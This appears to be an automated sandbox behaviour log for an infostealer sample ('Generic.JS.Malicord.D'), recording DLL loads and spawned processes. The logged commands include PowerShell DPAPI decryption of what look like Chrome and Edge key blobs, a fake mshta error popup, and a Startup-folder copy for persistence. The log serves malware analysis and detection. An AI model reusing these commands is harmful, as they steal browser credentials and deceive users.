Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ffmpeg.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uiautomationcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kbdus.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: nlaapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mshtml.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msiso.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msimtf.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxgi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: resourcepolicyclient.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dataexchange.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d3d11.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dcomp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: twinapi.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: jscript9.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: scrrun.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxcore.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: ffmpeg.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: uiautomationcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ffmpeg.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uiautomationcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kbdus.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxgi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: resourcepolicyclient.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d11.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d11.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mf.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mfplat.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: rtworkq.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: msmpeg2vdec.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mfperfhelper.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxva2.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: msvproc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d12.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d12.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d12core.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d10warp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxilconv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3dscache.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: twinapi.appcore.dll |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe "C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
|
Source: unknown |
Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe" |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
